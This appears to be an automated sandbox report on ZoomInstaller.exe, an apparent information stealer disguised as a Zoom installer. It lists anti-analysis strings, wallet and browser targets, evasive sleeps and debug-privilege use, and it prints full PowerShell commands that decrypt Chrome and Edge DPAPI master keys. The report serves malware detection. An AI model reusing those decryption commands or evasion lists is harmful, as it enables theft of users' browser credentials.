CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEB
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3528 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1768 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3611 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 940 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3534 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1336 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3030 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1415 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 3611 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 940 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: ZoomInstaller.exe Binary or memory string: sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=level 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameparsing time out of range is too largenot availabledalTLDpSugct?3814697265625GetTempPath2WModule32NextWRtlGetVersionRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDestroyWindowDrawFocusRectGetClassNameWGetClientRectGetMenuItemIDGetScrollInfoGetSystemMenuGetWindowRectOpenClipboardSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWname too longtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMgzip, deflategocacheverifyinstallgoroothtml/templateRegDeleteKeyWDeleteServiceStartServiceWGetDriveTypeWThread32FirstWaitCommEventRtlInitStringEnumProcessesExitWindowsExtimeEndPeriodWTSFreeMemoryinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressshared_secretempty integerunsupported: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228tVaUeNrRraoKwaVMware SVGA 3Dvmwareuser.exexenservice.exevmwaretray.exeChrome DefaultYandex DefaultCocCoc Defaultis a directory_secure_deleteunexpected EOFinternal errorgetprotobynameunknown mode: Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofunknown error unknown code: Not AcceptableComputerNameEx
Source: ZoomInstaller.exe Binary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptdnsapi.dllws2_32.dll%!Weekday(short read12207031256103515625ParseFloatLockFileExWSASocketWcomplex128t.Kind == CombineRgnGetBkColorGetObjectWSetBkColorStretchBltAlphaBlendGlobalFreeGlobalLockDragFinishBeginPaintCreateMenuDeleteMenuDrawIconExGetDlgItemGetSubMenuLoadImageWMoveWindowRemoveMenuSetCaptureShowWindowContent-IdMessage-IdParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: res binderres masterresumptionexp masterHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsRIPEMD-160dwmapi.dllIsValidSidLocalAllocOpenEventWOpenMutexWOpenThreadPulseEventResetEventSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27fv-az269-80ARCHIBALDPCrunneradminaAYRAp7xfuowatcher.exemitmweb.exeCharles.exePostman.exeFiddler.exeOllyDbg.exefiddler.exeregedit.exetaskmgr.exevmusrvc.exedf5serv.exeqemu-ga.exeollydbg.exediscord.exeuser_data#2user_data#3user_data#4user_data#5identifiantYoroiWalletKardiaChainNiftyWalletBraveWalletEqualWalletGuildWalletMarshalJSONMarshalTextunreachable_auth_crypt_query_only_cache_sizeshort writesubmissionsnil contexti/o timeouthttp2serverhttp2clientENABLE_PUSHEND_HEADERS/index.html ErrCode=%v, settings:retry-afterTTL expiredEarly HintsBad RequestBad Gateway/dev/stdout/dev/stderrOpenProcessGetFileType bytes ...
Source: ZoomInstaller.exe Binary or memory string: SYSTEMROOT=assistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailunspecifiedcgocall nil s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCloseHandleCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32.dllshell32.dlluserenv.dlltime: file 30517578125ProcessPrngMoveFileExWNetShareAddNetShareDelbad argSizemethodargs(reflect.Set.WithCancel.WithValue(PrintDlgExWmsimg32.dllSwapBuffersgdiplus.dllGlobalAllocDestroyIconDestroyMenuDrawMenuBarDrawTextExWFindWindowWGetAncestorGetCaretPosGetIconInfoGetKeyStateGetMenuInfoGetMessageWGetSysColorLoadCursorWLoadStringWMessageBeepMessageBoxWSetMenuInfouxtheme.dllIsAppThemedIn-Reply-ToReturn-PathClassHESIODauthoritiesadditionalstls10servertls: alert(local errorc e traffictraffic updApplicationHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/x509archive/zipSHA-512/224SHA-512/256BLAKE2s-256BLAKE2b-256BLAKE2b-384BLAKE2b-512sechost.dllversion.dllGetFileTimeSetCommMaskVirtualFreeNetUserEnumCoGetObjectEnumWindowsToUnicodeExinvalid oidpsk_id_hashavx512vnniwavx512vbmi284.147.62.1295.25.204.9092.211.52.6234.138.96.2334.83.46.13035.237.47.12195.239.51.3AppOnFly-VPSPeter WilsonFX7767MOR6Q6RDhJ0CNFevzX8Nl0ColNQ5bqPqONjHVwexsSmitmdump.exeInsomnia.exeKsDumper.exevmacthlp.exevboxtray.exevmtoolsd.exeksdumper.exepestudio.exeTelegram.exemot_de_passeidentifiantsEdge DefaultBinanceChainGuardaWalletJaxxxLibertyTerraStationMartianAptosBitAppWalletAtomicWalletSaturnWalletTempleWalletwith name %q_auto_vacuum_synchronoussqlite_cryptauthenticateauth_enabledshort bufferinvalid baseContent-Typemultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowcan't happentransmitfilehttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2out of range100-continuerecv_goaway_Multi-StatusNot ModifiedUnauthorizedI'm a teapotNot Extendedproxyconnectexit status sweepWaiterstraceStringsspanSetSpinemspanSpecialtraceTypeTabgcBitsArenasmheapSpecialgcpacertraceharddecommitmadvdontneeddumping heapchan receivelfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (
Source: ZoomInstaller.exe Binary or memory string: Handshakemath/randwinmm.dllPurgeCommSetupComminfo_hashQ9IATRKPRHQarZhrdBpjd1bnJkfVlHPxmdUOpVyxx64dbg.exex96dbg.exevmsrvc.exex32dbg.exeprl_cc.exechrome.exemsedge.exemotdepassepassphrasesauvegardeMathWalletEVERWalletPetraAptosFewchaMovePaliWalletMetamask_EMetaMask_O for type user32.dll2006-01-02_auth_user_auth_pass_auth_saltimpossible
Source: ZoomInstaller.exe Binary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFilePointerNetUserGetInfoGetUserNameExWTranslateNameW procedure in winapi error #: extra text: invalid syntax1907348632812595367431640625OpenSCManagerWModule32FirstWunsafe.Pointer on zero Valueunknown method.WithoutCancel.WithDeadline(RegSetValueExWLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWSizeofResourceCoInitializeExCoUninitializeSysAllocStringwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeAccept-CharsetDkim-SignatureRCodeNameErrorResourceHeaderunreachable: bad record MACneed more dataREQUEST_METHODmime/multipartControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWSetConsoleModeVirtualProtectVirtualQueryExGetShellWindowVerQueryValueWdata truncated169.150.197.118212.119.227.165109.145.173.169212.119.227.151195.181.175.105193.225.193.201212.119.227.167BEE7370C-8C0C-4DESKTOP-Z7LUJHJDESKTOP-0HHYPKQDESKTOP-TUAHF5IDESKTOP-NAKFFMTWIN-5E07COS9ALRB30F0242-1C6A-4DESKTOP-VRSQLAGDESKTOP-D019GDMDESKTOP-WI8CLETDESKTOP-B0T93D6DESKTOP-1PYKP29DESKTOP-1Y2433R6C4E733F-C2D9-4DESKTOP-WG3MYJSDESKTOP-7XC6GEZDESKTOP-5OV9S0OBinaryNinja.exevboxservice.exeUnknown versionVivaldi DefaultLiqualityWalletMaiarDeFiWalletAuthenticator_EzipinsecurepathGetMonitorInfoWBEGIN IMMEDIATEBEGIN EXCLUSIVEmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleallocmRInternalGC (fractional)write heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockruntime.Goschedmalloc deadlockruntime error: elem size wrong with GC prog
Source: ZoomInstaller.exe, 00000000.00000002.1983594822.00000297456FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring" Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\FENIVHOIKN VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\My Music VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Queries volume information: C:\Users\user\Documents\My Videos VolumeInformation Jump to behavior
